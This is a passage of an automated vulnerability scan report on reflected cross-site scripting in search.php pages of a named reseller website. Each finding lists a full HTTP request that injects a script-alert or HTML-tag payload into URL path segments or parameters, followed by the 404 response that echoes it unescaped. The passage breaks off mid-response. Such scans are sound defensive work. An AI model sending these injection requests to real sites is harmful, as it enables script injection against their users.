<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/search.php?keyword=search...91263<a>d45704d6846&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.557. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d0508<script>alert(1)</script>a9fb5d52a16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&d0508<script>alert(1)</script>a9fb5d52a16=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&d0508<script>alert(1)</script>a9fb5d52a16=1 was not found on this server.</p>
...[SNIP]...

2.558. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5f5b4<a>f02b6a2883c was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=25f5b4<a>f02b6a2883c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=25f5b4<a>f02b6a2883c was not found on this server.</p>
...[SNIP]...

2.559. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload af2e7<script>alert(1)</script>60da122253e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationaf2e7<script>alert(1)</script>60da122253e/broadband/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationaf2e7<script>alert(1)</script>60da122253e/broadband/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.560. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fdb5e<script>alert(1)</script>69e80c57a94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadbandfdb5e<script>alert(1)</script>69e80c57a94/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadbandfdb5e<script>alert(1)</script>69e80c57a94/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.561. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5f2c0<script>alert(1)</script>5ae70f00916 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes5f2c0<script>alert(1)</script>5ae70f00916/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes5f2c0<script>alert(1)</script>5ae70f00916/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.562. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e22e<script>alert(1)</script>2c24ddad42f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos5e22e<script>alert(1)</script>2c24ddad42f/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos5e22e<script>alert(1)</script>2c24ddad42f/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.563. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8583c<script>alert(1)</script>e53750b73fa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/search.php8583c<script>alert(1)</script>e53750b73fa?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/search.php8583c<script>alert(1)</script>e53750b73fa?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.564. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 15ac0<a>fef086859d was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/search.php?keyword=search...&Submit3=Search15ac0<a>fef086859d&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/search.php?keyword=search...&Submit3=Search15ac0<a>fef086859d&opt=2 was not found on this server.</p>
...[SNIP]...

2.565. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 778a1<a>15d6fe302e2 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/search.php?keyword=search...778a1<a>15d6fe302e2&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/search.php?keyword=search...778a1<a>15d6fe302e2&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.566. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c6f3f<script>alert(1)</script>b1a38381a1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&c6f3f<script>alert(1)</script>b1a38381a1b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&c6f3f<script>alert(1)</script>b1a38381a1b=1 was not found on this server.</p>
...[SNIP]...

2.567. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 10146<a>2c0c8b56efe was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=210146<a>2c0c8b56efe HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=210146<a>2c0c8b56efe was not found on this server.</p>
...[SNIP]...

2.568. http://www.resellerbase.com/communication/broadband/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5acd9<script>alert(1)</script>9590df2a9e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication5acd9<script>alert(1)</script>9590df2a9e0/broadband/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication5acd9<script>alert(1)</script>9590df2a9e0/broadband/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.569. http://www.resellerbase.com/communication/broadband/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload de3b2<script>alert(1)</script>aa1383a62fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadbandde3b2<script>alert(1)</script>aa1383a62fc/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadbandde3b2<script>alert(1)</script>aa1383a62fc/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.570. http://www.resellerbase.com/communication/broadband/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 64d83<script>alert(1)</script>081b422cf44 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes64d83<script>alert(1)</script>081b422cf44/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes64d83<script>alert(1)</script>081b422cf44/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.571. http://www.resellerbase.com/communication/broadband/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4468<script>alert(1)</script>0a941fbb124 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/search.phpb4468<script>alert(1)</script>0a941fbb124?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/search.phpb4468<script>alert(1)</script>0a941fbb124?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.572. http://www.resellerbase.com/communication/broadband/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload b683e<a>b9b194a2e64 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/search.php?keyword=search...&Submit3=Searchb683e<a>b9b194a2e64&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/search.php?keyword=search...&Submit3=Searchb683e<a>b9b194a2e64&opt=2 was not found on this server.</p>
...[SNIP]...

2.573. http://www.resellerbase.com/communication/broadband/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload d1669<a>5ee5010ac67 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/search.php?keyword=search...d1669<a>5ee5010ac67&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/search.php?keyword=search...d1669<a>5ee5010ac67&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.574. http://www.resellerbase.com/communication/broadband/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 628bb<script>alert(1)</script>f63702e0b9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/search.php?keyword=search...&Submit3=Search&opt=2&628bb<script>alert(1)</script>f63702e0b9e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

